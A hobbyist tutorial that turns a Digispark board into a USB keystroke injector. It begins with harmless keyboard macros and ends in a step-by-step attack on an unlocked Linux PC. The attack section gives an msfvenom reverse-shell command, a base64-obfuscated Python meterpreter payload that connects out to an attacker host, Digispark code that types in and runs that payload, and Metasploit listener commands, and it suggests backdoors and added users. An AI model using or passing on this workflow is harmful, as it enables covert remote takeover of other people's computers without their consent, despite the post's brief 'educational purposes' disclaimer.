Arduino Rubber Ducky Introduction
Hey guys, let’s get our hands dirty. Ever heard of USB rubber ducky? Well, simply it is a programmed USB keyboard in the form of a Pendrive, which will send the keystrokes to a device connected to it and can be used to prank or even hack unlocked PCs.
Will you guys believe if I say, we can do it with a 1.5$ Arduino compatible board with simple coding without detailed knowledge on how USB works? Yes, you can make your own Arduino Rubber Ducky!
What you will learn?
In this post, I am going to show you can do cool stuff using Arduino HID functionality. You can make your Arduino to work as a keyboard or as a mouse and do pretty cool stuff with the push of a button.
Arduino Rubber Ducky Video Tutorial
I will be showing you how you can literally hack a PC and control it remotely using this tiny board. I will share a complete tutorial, codes, and circuit diagrams in the description! The codes are also available in GITHUB so feel free to download, edit and add more functions to it. Let’s get started!
Digispark – Explained
This is Digispark. It is a light weight microcontroller development board. It comes with 6 GPIO pins, I2C and SPI serial communication and a USB interface.
It also has 3 PWM pins which can be used to control l293d motor drivers or servo motors. We can use Arduino IDE to program Digispark but the way we upload the program is a little bit different than usual.
Here, I have explained everything from the Digispark introduction to the first code upload. Check it out if you are interested!
Digispark as HID
This board can also act as HID. HID or Human Interface Devices are Devices that take input from us and pass it on to the device connected to it. HID devices include keyboard, joystick, mouse, touchpad, graphic tablet, etc.
Let’s make use of this functionality and have some fun.
Steps – Arduino Rubber Ducky
Step 1 – The Circuit
Circuit Explained
I have designed a PCB that has some buttons so that I can run multiple codes without reprogramming the digispark.
This is the circuit, Since we have 5V coming out from the USB port, we don’t need additional supply. Here we have some switches, Resistors, and indicator LEDs. I will share the link of the PCB files in the description.
Soldering
The PCB will be manufactured and shipped within days and will be delivered to your doorstep within the mentioned time period. Once you get the PCB in hand, all you have to do is solder the header pins and connect all the components.
Step 2 – Installing Digispark Drivers
Now lets install the drivers, board and library. Go to this link and download the drivers.
https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip
Extract it and install the drivers
Step 3 – Install and Setting up Arduino IDE
Install Arduino
Download arduino IDE if you don’t have it. Download it from: https://www.arduino.cc/en/Main/Software
Install Board
Start the Arduino IDE and go to the “File” menu and select “Preferences” and paste this line of code in the Additional Board Manager URL.
http://digistump.com/package_digistump_index.json
Go to “Tools” menu and then the “Board” submenu – select “Boards Manager” and then select “Contributed”. Select the “Digistump AVR Boards” package and click the “Install” button.
Once it completes, close the “Boards Manager” window and go to Tools→Boards and select “Digispark (Default – 16.5mhz)”.
Install Library
Next we will install the Arduino Digikeyboard library which will make it easy for us to send HID commands to the PC using Digispark. This can be easily installed from the library manager itself.
Step 4 – Coding
Now we will start coding. Guys these are all the keystrokes you can send to your PC using Digispark using the Digikeyboard library. I will leave the link in the description because you will need to for coding!
Digikeyboard Library Keystrokes
Special Keys
- MOD_CONTROL_LEFT – Left Ctrl key
- MOD_SHIFT_LEFT – Left Shift key
- MOD_ALT_LEFT – Left Alt key
- MOD_GUI_LEFT – Left Windows key
- MOD_CONTROL_RIGHT – Right Ctrl key
- MOD_SHIFT_RIGHT – Right Shift key
- MOD_ALT_RIGHT – Right Alt key
- MOD_GUI_RIGHT – Right Windows key
Alphabets
- KEY_A
- KEY_B
- KEY_C
- KEY_D
- KEY_E
- KEY_F
- KEY_G
- KEY_H
- KEY_I
- KEY_J
- KEY_K
- KEY_L
- KEY_M
- KEY_N
- KEY_O
- KEY_P
- KEY_Q
- KEY_R
- KEY_S
- KEY_T
- KEY_U
- KEY_V
- KEY_W
- KEY_X
- KEY_Y
- KEY_Z
Numbers
- KEY_1
- KEY_2
- KEY_3
- KEY_4
- KEY_5
- KEY_6
- KEY_7
- KEY_8
- KEY_9
- KEY_0
Functions
- KEY_F1
- KEY_F2
- KEY_F3
- KEY_F4
- KEY_F5
- KEY_F6
- KEY_F7
- KEY_F8
- KEY_F9
- KEY_F10
- KEY_F11
- KEY_F12
Don’t worry if this looks confusing, you will understand better when we look into our code.
Basic Codes
First I will show you the basic setup. Basically, we have 4 different buttons. We will assign 1 task for each button so that when one button is pressed, it will run the corresponding function and execute the task.
#include <DigiKeyboard.h>
int button1, button2, button3, button4;
void setup()
{
pinMode(0, INPUT);
pinMode(1, INPUT);
pinMode(2, INPUT);
pinMode(3, INPUT);
}
void loop()
{
button1=digitalRead(0);
button2=digitalRead(1);
button3=digitalRead(2);
button4=digitalRead(3);
if(button1==1)
{
hello();
}
else if(button2==1)
{
lock();
}
else if(button3==1)
{
notepad();
}
else if(button4==1)
{
poweroff();
}
}
void hello()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.println("Hello World");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
}
void lock()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke( KEY_L , MOD_GUI_LEFT);
DigiKeyboard.delay(5000);
}
void notepad()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
DigiKeyboard.delay(250);
DigiKeyboard.println("notepad");
}
void poweroff()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
DigiKeyboard.delay(250);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(1000);
DigiKeyboard.println("shutdown /s");
}- First function is to send keystroke of “Hello World”,
- Second Function is to send the keystroke “Windows Button + L Key” to lock windows.
- Third Function is to send keystrokes to open notepad.
- And 4th Function is to send keystrokes to shutdown the PC.
Let’s upload and check it out.
First press button 1 and yeah! It will print hello world. Now lets try button 2 that will lock the PC. Now lets try button 3. Cool right? I will press button 4 at the end. Otherwise I will have to start everything all over again.
This way you can send keystrokes using your arduino to do some useful stuffs like media control, make your own keyboard, play pranks, or even hack PCs
Taking Control over a PC
Now, as promised, I will show you how to take over an unlocked PC and gain remote access to it. Please note that this is only for educational purposes and to show you how dangerous this little thing can be.
For this part, you will need a Linux PC with Metasploit installed in it. Metasploit framework is a collection of tools that can be used to write exploits and penetrate into remote machines. This tool is pre-installed in Kali Linux. In a moment, I will show you how it is done.
Creating Payload
Next, We have to create a code which when executed in the victim’s machine initiates a connection back to our PC.
In the Terminal, execute the below command.msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py
Here, LHOST is the IP ADDRESS OF YOUR MACHINE and
LPORT is the PORT FOR REVERSE SHELL TO CONNECT ON
This will create a payload named pythonpaload.py.
The contents of the file looks somewhat like this
import
base64,sys;exec(base64.b64decode({2:str,3:lambda
b:bytes(b,’UTF-8′)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMC45LjcuMjA3Jyw5MDAwKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==’)))
The Arduino Code for Digispark Rubber Ducky
Now open that file and copy all the contents in the file as shown in the video.
Below is the code which is uploaded to digispark. Copy the contents of the pythonpayload.py and paste it in the 9th line.
void setup()
{
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);
DigiKeyboard.delay(2000);
DigiKeyboard.println(“python “);
DigiKeyboard.delay(500);
DigiKeyboard.println(“Paste the python code here”);
DigiKeyboard.delay(1000);
DigiKeyboard.println(“quit()”);
DigiKeyboard.delay(500);
DigiKeyboard.println(“exit”);
}
void loop()
{
}Basically, what this code does is
- Wait for 2 seconds
- Press ALT + CONTROL + T to open up the terminal
- Wait for 2 seconds
- Type in ‘python’ and Press Enter to start Python
- Wait for 0.5 seconds
- Type in the python exploit code and press enter to execute it
- Wait for 1 second
- Type ‘quit()’ and press enter to exit python
- Wait for 0.5 seconds
- Type exit and press enter to exit the terminal.
Now, Upload the code.
Setting Up the Listener
Next, we have to start the listener which will wait for incoming connections in the given port. Fire up Metasploit and execute the below codes in order.
msfconsole
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST <IP ADDRESS OF YOUR MACHINE>
set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>
exploitThis will start the listener.
Launch the Attack
Now all you have to do is connect this digispark to our Victims unlocked machine. All you need is a 10 second window. All the codes will run in 5 seconds.
Once you get the shell, you can do almost anything with that; create a persistent back door, upload or download files, create another user and provide it SSH access, possibilities are endless.
This code works if your friend’s PC uses linux OS. Similarly we can write a code for windows too. The windows version will be updated in the link below. Follow the link in the description and you will complete complete details on the project. The codes are also available in GITHUB and feel free to download, edit and add more functions to it.
See you soon guys. See you in the next video.
